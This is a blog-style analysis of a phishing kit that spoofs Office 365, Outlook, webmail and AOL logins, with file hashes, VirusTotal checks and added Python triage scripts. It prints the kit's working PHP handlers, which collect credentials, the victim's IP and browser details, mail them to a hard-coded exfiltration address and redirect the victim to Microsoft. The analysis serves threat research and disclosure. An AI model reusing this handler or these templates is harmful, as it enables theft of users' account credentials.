Phishing findings, campaign #1: u.zip (Office365/Outlook)

I started hunting and reporting phishing websites on Twitter: follow me here if you are interested! In this series of posts I am going to analyze and discuss some of the phishing kits found online.

Let’s start from the beginning

Here is my tweet containing some information about this instance of the kit:

The second screenshot shows that the zip containing the phishing kit was left exposed on the web server, so we can download it and look it up on VirusTotal using the SHA-256 hash of the zip:

$ sha256sum u.zip
c9079c6f6576da99f979b637c358a45f89c7187ddb80edf9e7fb2d9500880173  u.zip
u.zip on VirusTotal

Explore the kit

When extracting the archive, we can see the following structure:

u
├── aol.php
├── css
│   ├── bootstrap.min.css
│   └── style.css
├── emailcode
│   └── email.php
├── images
│   ├── landing-devices-bg.jpg
│   ├── mail.png
│   ├── microbg.jpg
│   ├── microsoftlogo.png
│   ├── mobile-img.png
│   ├── officebg.jpg
│   ├── officelogo.png
│   ├── office.png
│   ├── Onedrive-logo.png
│   ├── outlook.png
│   └── webmaillogo.png
├── index.php
├── js
│   └── bootstrap.min.js
├── microsoft.php
├── office.php
├── outlookcode
│   └── email.php
└── webmail.php

I usually start the analysis from the entry point, which here is index.php. Looking at the div with class loginform reveals an interesting feature of this kit: it offers the victim three login options (Office 365, Outlook and ‘other mail’).

Here is how it looks in the code and in the browser:

<div class="loginform">
<a href="office.php"  class="loginoffice">Login with Office 365</a>
<a href="microsoft.php" class="loginoutlook">Login with Outlook</a>
<a href="webmail.php" class="loginmail">Login with Other Mail</a>
</div>
How this phishing kit looks when deployed

Exfiltration method

The three PHP files linked from index.php all point the action of their credential form at emailcode/email.php. Here is the form from one of them, webmail.php:

<form name="webmail" methed="post" action="emailcode/email.php">
   <div class="form-group orangeclr">
       <label for="email">Email Address</label>
       <div class="input-group mb-2 mr-sm-2 mb-sm-0">
           <div class="input-group-addon" style="width: 2.6rem"><i class="fa fa-at"></i></div>
           <input type="text" name="email" class="form-control" id="email"
                    placeholder="you@example.com" required autofocus>
       </div>
   </div>
   <div class="form-group orangeclr">
       <label class="" for="password">Password</label>
       <div class="input-group mb-2 mr-sm-2 mb-sm-0">
           <div class="input-group-addon" style="width: 2.6rem"><i class="fa fa-key"></i></div>
           <input type="password" name="password" class="form-control" id="password"
                  placeholder="Password" required>
       </div>
   </div>
   <div class="gostepbtn">
       <input type="submit" name="submit_btn" value="Go to step 2" class="gostep" />
   </div>
</form>

After the victim enters the credentials, the browser submits them to emailcode/email.php. Note that in the webmail.php form reproduced above the attribute is spelled methed rather than method: browsers ignore the unknown attribute and fall back to GET, so the credentials travel in the URL query string (and end up in the web server's access log). The handler works either way, because it reads everything from $_REQUEST, which merges GET and POST parameters. Let’s check what happens in there:

<?php
if(isset($_REQUEST['submit_btn'])){
    $admin_email = "macdon161@gmail.com";
    $email = $_REQUEST['email'];
    $password = $_REQUEST['password'];
    $ip = getenv("REMOTE_ADDR");
    $country = ip_visitor_country();
    $region = ip_visitor_region();
    $city = ip_visitor_city();
    $adddate = date("D M d, Y g:i a");
    $browser = $_SERVER['HTTP_USER_AGENT'];

$admin_email holds the exfiltration address for this instance of the kit, so we can confirm that the stolen data is sent directly by email to the address stored in that variable.

As the code above shows, the email contains several pieces of information: the credentials, the IP address, the date and the User-Agent string. The kit also tries to resolve the country, region and city of the victim by sending a request to geoplugin.net with curl_init, passing the IP address. However, as of this writing the service has moved to geoplugin.com, so the kit cannot currently collect this information.

<?php
// Always set content-type when sending HTML email
$formname = $_REQUEST['logintype'];
switch ($formname) {
    case "office":
        $message .= "Login Type Selection -- Office \n";
        $subject = "Office login attempt -- ".$ip;
        break;
    case "outlook":
        $message .= "Login Type Selection -- Outlook \n";
        $subject = "Outlook login attempt -- ".$ip;
        break;
    case "webmail":
        $message .= "Login Type Selection -- Webmail \n";
        $subject = "Webmail login attempt -- ".$ip;
        break;
    default:
        $message .= "Login Type Selection -- other \n";
        $subject = "other login attempt -- ".$ip;
}

Using a switch on the logintype parameter, the kit determines which template the victim came from and adjusts the message and the subject of the email accordingly. Note that the webmail.php form reproduced above contains no logintype field, so unless the parameter is set somewhere else, submissions from that template fall into the default branch and are labelled ‘other’.

In the rest of the code the headers and body of the email are set, then the email is sent using mail(). The carefully built $headers string is never actually used: the mail() call below passes only three arguments, so the message goes out as plain text with the server's default headers, and the leading @ suppresses any error if sending fails. After that, the victim is redirected to a Microsoft login page: https://login.microsoftonline.com/common/oauth2.

<?php
$from = 'Outlook <noreply>';
// To send HTML mail, the Content-type header must be set
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
// Create email headers
$headers .= 'From: '.$from."\r\n".
    'Reply-To: '.$from."\r\n" .
    'X-Mailer: PHP/' . phpversion();
$headers .= "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
// More headers
$headers .= "Reply-To: ". strip_tags($email) . "\r\n";
$message .= "Username/Email -- $email\n";
$message .= "Password -- $password\n";
$message .= "IP --  ".$ip."\n";
$message .= "Country Detected --  ".$country."\n";
$message .= "Region Detected --  ".$region."\n";
$message .= "City Detected --  ".$city."\n";
$message .= "Date --  ".$adddate."\n";
$message .= "Browser Detected --  ".$browser."\n";
  //send email
@mail($admin_email,$subject,$message);
header('Location: https://login.microsoftonline.com/common/oauth2');
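To triage a handler like this quickly I extract the indicators statically instead of reading every line. The following Python script is an added example and is not part of the kit or of the original post: it pulls hard-coded exfiltration addresses, the request parameters the handler reads, redirect targets, contacted hosts and every mail() call, noting whether a fourth (headers) argument is passed and whether the call is silenced with @. The embedded sample handler is a constructed, condensed copy of the code above; the geoplugin URL in it is an assumption about the shape of the curl_init call, since the kit's own geolocation helpers are not reproduced here.

```python
import re

# Constructed sample: a condensed copy of emailcode/email.php as shown in the post.
# The curl_init() line is an assumption about how the geoplugin.net lookup looks.
SAMPLE_HANDLER = r'''<?php
if(isset($_REQUEST['submit_btn'])){
    $admin_email = "macdon161@gmail.com";
    $email = $_REQUEST['email'];
    $password = $_REQUEST['password'];
    $ip = getenv("REMOTE_ADDR");
    $ch = curl_init("http://www.geoplugin.net/json.gp?ip=".$ip);   // assumed shape
    $formname = $_REQUEST['logintype'];
    $message .= "Username/Email -- $email\n";
    $message .= "Password -- $password\n";
    @mail($admin_email,$subject,$message);
    header('Location: https://login.microsoftonline.com/common/oauth2');
}
'''

# Loose e-mail literal; good enough for strings hard-coded in kit sources.
EMAIL_RE = r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"


def _call_args(src, open_paren):
    """Return the top-level arguments of the call whose '(' sits at src[open_paren].

    Tracks parentheses and PHP string quotes so commas inside nested calls or
    string literals are not mistaken for argument separators.
    """
    depth, quote, start, args = 0, None, open_paren + 1, []
    i = open_paren
    while i < len(src):
        c = src[i]
        if quote:
            if c == "\\":
                i += 1                      # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'":
            quote = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                args.append(src[start:i].strip())
                break
        elif c == "," and depth == 1:
            args.append(src[start:i].strip())
            start = i + 1
        i += 1
    return [a for a in args if a]


def extract_iocs(php_source):
    """Pull the analyst-relevant indicators out of a kit's PHP handler."""
    mail_calls = []
    for m in re.finditer(r"(@?)\bmail\s*\(", php_source):
        args = _call_args(php_source, m.end() - 1)
        mail_calls.append({
            "args": len(args),
            # mail($to, $subject, $message, $headers): fewer than 4 arguments
            # means any $headers the kit assembled are never used.
            "headers_passed": len(args) >= 4,
            "suppressed": m.group(1) == "@",   # a leading @ hides send failures
        })
    return {
        "exfil_emails": sorted(set(
            re.findall(r"\$\w+\s*=\s*[\"'](" + EMAIL_RE + r")[\"']", php_source))),
        "request_params": sorted(set(
            re.findall(r"\$_(?:REQUEST|POST|GET)\[\s*[\"'](\w+)[\"']\s*\]", php_source))),
        "redirects": re.findall(r"header\(\s*[\"']Location:\s*([^\"']+)[\"']", php_source),
        "external_hosts": sorted(set(re.findall(r"https?://([A-Za-z0-9.-]+)", php_source))),
        "mail_calls": mail_calls,
    }


if __name__ == "__main__":
    import json
    import sys
    # Pass a path to a real handler, or run without arguments to see the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SAMPLE_HANDLER
    print(json.dumps(extract_iocs(source), indent=2))
```

The regexes are deliberately permissive: a kit author's typo in a variable name must not hide the exfiltration address, so anything assigned an e-mail literal is reported, and the reader sorts out false positives by hand.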

Other php files

At this point the workflow of the kit seems clear. However, two PHP files appear unrelated to the rest of the kit, because they are never called or included: outlookcode/email.php and aol.php.

outlookcode/email.php

This file seems to have the same purpose as emailcode/email.php, but it is less sophisticated: there is no switch to handle multiple phishing pages. Unlike the other handler, it does pass $headers to mail(), using the victim's own email address as From and Reply-To. Here is the code:

<?php
if(isset($_REQUEST['submit_btn'])){
    $admin_email = "macdon161@gmail.com";
    $email = $_REQUEST['email'];
    $password = $_REQUEST['password'];
      // $headers = "From:".$email;

      // Always set content-type when sending HTML email
    $headers = "MIME-Version: 1.0" . "\r\n";
    $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";

    // More headers
    $headers .= 'From:'.$email . "\r\n";


    $subject = 'Recived data'.$email;

    $headers = "From: " . strip_tags($email) . "\r\n";
    $headers .= "Reply-To: ". strip_tags($email) . "\r\n";
    $headers .= "MIME-Version: 1.0\r\n";
    $headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";

    $message = '<html><body>';
    $message .= '<p>Username: '.$email.'<p><br>';
    $message .= '<p>Password: '.$password.'<p><br>';
    $message .= '</body></html>';
      //send email
    if(mail($admin_email, $subject, $message, $headers )){
      header('Location: https://login.microsoftonline.com/common/oauth2');
    }

}
      //if "email" variable is not filled out, display the form

Considering that the exfiltration email is also included here, I assume that this is just the code of an old version of the kit that was left in the zip by mistake… But who knows? 🤷

aol.php

If we manually navigate to aol.php with our browser, we see the following:

aol.php

It seems to be another phishing page, this time for AOL, an app with email capabilities.

Interacting with the page, we notice that ‘Forgot Password?’, ‘Get a Free Username’ and ‘Erase Hard Drive Junk Now’ do not work, and the same applies to the ‘GET THE AOL APP’ button: in the source code, they all have an href attribute equal to javascript:void(0).

AOL apps

Here is the form:

<?php
require_once('emailcode/email.php')
?>
// SKIPPING NOT INTERESTING HTML
<form class="needs-validation" method="post" action="" novalidate>
    <div class="form-group">
	<input type="Email" class="form-control" id="validationCustom01" placeholder="Email" required>
	<div class="invalid-feedback">
	    Enter Email Address
	</div>
    </div>
    <div class="form-group">
	<input type="password" class="form-control" id="validationCustom02" placeholder="Password" required>
	<div class="invalid-feedback">
	    Enter Password
	</div>
    </div>
    <a href="javascript:void(0);" class="forgotBtn">Forgot Password?</a>
    <button class="btn stepBtn" type="submit">Go to step 2</button>
    <div class="get-user">
	<span><a href="javascript:void(0);">Get a Free Username</a></span>
	<a href="javascript:void(0);">Erase Hard Drive Junk Now</a>
    </div>
</form>

As in the other phishing pages of the kit, emailcode/email.php is included here as well. However, this form can never deliver anything to it. The empty action attribute makes the browser submit back to aol.php itself, which does include the handler, so that alone would not break it; the real problem is that none of the inputs has a name attribute and the submit button is not named submit_btn, so the request carries no email, password or submit_btn parameter and the handler's isset($_REQUEST['submit_btn']) check never passes.
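Whether a template can deliver anything at all, as discussed for webmail.php (the misspelled method attribute) and for aol.php (the empty action and the unnamed inputs), can be checked mechanically. The Python script below is an added example, not code from the kit or from the original post: it parses each form, resolves the action against the page URL, resolves the effective method the way a browser does, and lists the parameters that would actually be submitted. The two embedded forms are constructed, trimmed copies of the ones shown above, and http://kit.example/ is a placeholder for wherever the kit was hosted.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample input: the two forms shown in the post, trimmed to the
# attributes that matter. The "methed" typo and the missing name attributes
# are reproduced on purpose. http://kit.example/ is a placeholder host.
WEBMAIL_FORM = """
<form name="webmail" methed="post" action="emailcode/email.php">
  <input type="text" name="email" id="email" placeholder="you@example.com" required autofocus>
  <input type="password" name="password" id="password" placeholder="Password" required>
  <input type="submit" name="submit_btn" value="Go to step 2" class="gostep" />
</form>
"""

AOL_FORM = """
<form class="needs-validation" method="post" action="" novalidate>
  <input type="Email" class="form-control" id="validationCustom01" placeholder="Email" required>
  <input type="password" class="form-control" id="validationCustom02" placeholder="Password" required>
  <a href="javascript:void(0);" class="forgotBtn">Forgot Password?</a>
  <button class="btn stepBtn" type="submit">Go to step 2</button>
</form>
"""

FIELD_TAGS = {"input", "button", "select", "textarea"}


class FormAuditor(HTMLParser):
    """Records, for every <form>, where it submits and which parameters it sends."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url   # URL the page was served from; resolves relative actions
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            method = (attrs.get("method") or "").lower()
            self._form = {
                "name": attrs.get("name"),
                # An empty or missing action submits back to the current document.
                "action": urljoin(self.page_url, attrs.get("action") or ""),
                # A missing, misspelled or unknown method falls back to GET.
                "method": method if method in ("post", "dialog") else "get",
                "method_attr_present": "method" in attrs,
                "fields": [],
                "unnamed_inputs": 0,
            }
        elif tag in FIELD_TAGS and self._form is not None:
            # Only controls with a name attribute are included in the request.
            if attrs.get("name"):
                self._form["fields"].append(attrs["name"])
            else:
                self._form["unnamed_inputs"] += 1

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def audit_forms(html, page_url):
    """Parse every form on a page served from page_url."""
    parser = FormAuditor(page_url)
    parser.feed(html)
    parser.close()
    return parser.forms


def summarize(form):
    """Answer the two questions that decide whether a template works at all."""
    return {
        "handler": form["action"],
        "credentials_in_url": form["method"] == "get" and bool(form["fields"]),
        "submits_nothing": not form["fields"],
    }


if __name__ == "__main__":
    pages = (("webmail.php", WEBMAIL_FORM, "http://kit.example/webmail.php"),
             ("aol.php", AOL_FORM, "http://kit.example/aol.php"))
    for name, html, url in pages:
        for form in audit_forms(html, url):
            print(name, form["method"].upper(), form["fields"], summarize(form))
```

Run against a live copy of a kit (fetch each template, pass its URL as page_url) the same checks tell you which templates are worth watching for stolen credentials and which ones, like aol.php here, are dead weight.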

The file is clear according to VirusTotal:

aol.php on VirusTotal

What about the other files?

We can check the VirusTotal detections of all the files using their SHA-256 hashes:

$ find . -type f | xargs sha256sum
e7ed36ceee5450b4243bbc35188afabdfb4280c7c57597001de0ed167299b01b  ./js/bootstrap.min.js
2777abe0312e6b49428d5d7f7f42e43af620793f86f823f2e045968afbdddb63  ./images/microbg.jpg
2ebc65a696544b8d69ade5f136250a9548d4badf1b9ad459e63ff68e7a985c69  ./images/mail.png
17f02fdb590800c9a21e2b6166f5f22cc54952d58897f09d8e82bb9195bc2071  ./images/outlook.png
089aa7fa65a4038b4ab9130d083e6bcc24b0e33f5018984ef1463b8516bc7993  ./images/microsoftlogo.png
e298d32d99708f56d68ef9cd0c44ec85910a4df7552b5b2041fcaa48d5ee9742  ./images/webmaillogo.png
efaccc2b190fcce0f0ab41064d882fb4a701c6aed6b1035595a16138e32a0a50  ./images/officelogo.png
6adc34b6d4d872e313e0857063eac568a489ab092ff0f15834a2559043c9c1e2  ./images/mobile-img.png
c86c4a6731077f1994a8caeccb1fc06477ea35a5b6abbb4abde1d06b8ef9ff32  ./images/landing-devices-bg.jpg
4603ea1b2f9df0c9d4f2a253c550ffbaf27ea2cb53ecde4277b2acf9dde33979  ./images/Onedrive-logo.png
1500514adf9e666a3d20530815df881bc94812c6906a53bd4c216d051d18c372  ./images/office.png
7a2c0b0e1e16041b12dd1a7d18438ceb14063c980799baee1d55cb2f04892777  ./images/officebg.jpg
84f1d1ffdc036768ffeba1be92362dcf619e7ce6ec27500ab47844ed24fc4230  ./index.php
0b09beb179bd176c93c443175940777332cf57ac9e4487ea9088ae21e3c6d032  ./microsoft.php
8979f584623e4307a42bd008d755c35456af8cb96bec89dd4fbec47036e20184  ./css/style.css
2c0f3dcfe93d7e380c290fe4ab838ed8cadff1596d62697f5444be460d1f876d  ./css/bootstrap.min.css
c60bd69cdc08032d32898d4d3f7648a5370f15720b58b51af77a4ecd72799bc3  ./webmail.php
e5a35da055cf9b0cf6d4cfbd2d0e8be75ebdc56949740c5e767f12915e6174eb  ./office.php
085f5dfb1f89bd983c58e618a95bf7bdaa872bee4a126495ec3e7cf421bb9fc2  ./aol.php
3234d6c03d185864d6537178a4d1e44c5277c9115f11b07f9c5be0517ebc51a7  ./emailcode/email.php
d6083dcb3385f93916f63b6e50d28791a51842d38bd507bcad7b731b7b33009d  ./outlookcode/email.php
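For a kit with more files, or for repeating the check later, the hashing and the VirusTotal lookup can be scripted. The following Python script is an added example and not part of the original post: it builds a sorted SHA-256 manifest of every file under a directory and, when a VirusTotal API key is supplied through the VT_API_KEY environment variable, queries the v3 files endpoint for each hash, mapping an HTTP 404 to "never submitted". The sample directory it creates contains constructed files with well-known test-vector digests, not the real kit files.

```python
import hashlib
import json
import os
import tempfile
import time
import urllib.error
import urllib.request

VT_FILES_URL = "https://www.virustotal.com/api/v3/files/"


def sha256_file(path, chunk_size=1 << 16):
    """Stream a file through SHA-256 so large archives need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def hash_tree(root):
    """Return {relative path: sha256} for every regular file below root, sorted by path."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full):
                manifest[os.path.relpath(full, root)] = sha256_file(full)
    return dict(sorted(manifest.items()))


def vt_lookup(sha256, api_key, timeout=30):
    """Look one hash up on VirusTotal (API v3).

    Returns the per-engine stats, or None when the hash has never been
    submitted (what the web UI reports as "no matches found").
    """
    req = urllib.request.Request(
        VT_FILES_URL + sha256,
        headers={"x-apikey": api_key, "Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = json.load(resp)
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return None
        raise
    return body["data"]["attributes"]["last_analysis_stats"]


def triage(root, api_key=None, pause=15.0):
    """Hash the kit; if an API key is given, enrich each entry with VT results."""
    report = {}
    for rel_path, digest in hash_tree(root).items():
        entry = {"sha256": digest}
        if api_key:
            entry["vt"] = vt_lookup(digest, api_key)
            time.sleep(pause)   # the public API allows 4 lookups per minute
        report[rel_path] = entry
    return report


def build_sample_kit():
    """Write a tiny constructed kit layout to a temp dir and return its path.

    The contents are chosen so the digests are standard SHA-256 test vectors
    ("abc" and the empty string), not the hashes of the real u.zip files.
    """
    root = tempfile.mkdtemp(prefix="kit-")
    os.makedirs(os.path.join(root, "emailcode"))
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"abc")
    with open(os.path.join(root, "emailcode", "email.php"), "wb") as fh:
        fh.write(b"")
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_kit()
    print(json.dumps(triage(target, os.environ.get("VT_API_KEY")), indent=2))
```

Looking hashes up, rather than uploading the files, keeps the kit out of the public corpus until you decide to share it; when you do upload, the hash-only report will then show the same detections the post's screenshots do.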

Here are the detections of index.php, microsoft.php, office.php and webmail.php on VirusTotal as of today.

index.php, microsoft.php, office.php and webmail.php on VirusTotal

VirusTotal returned ‘no matches found’ for emailcode/email.php and outlookcode/email.php, meaning their hashes had never been submitted. All the other files were reported as ‘Undetected’ by every engine on VirusTotal.

Conclusion

In this post we analyzed u.zip, a phishing kit found online that tricks victims into handing over their credentials using three templates: one for Office 365, one for Outlook and one for other email services (with a cPanel theme).

Schema of the phishing kit

The templates submit the credentials to emailcode/email.php, which tries to gather additional information about the victim, writes everything into an email and sends it to the exfiltration address. At the end of the execution the victim is redirected to login.microsoftonline.com.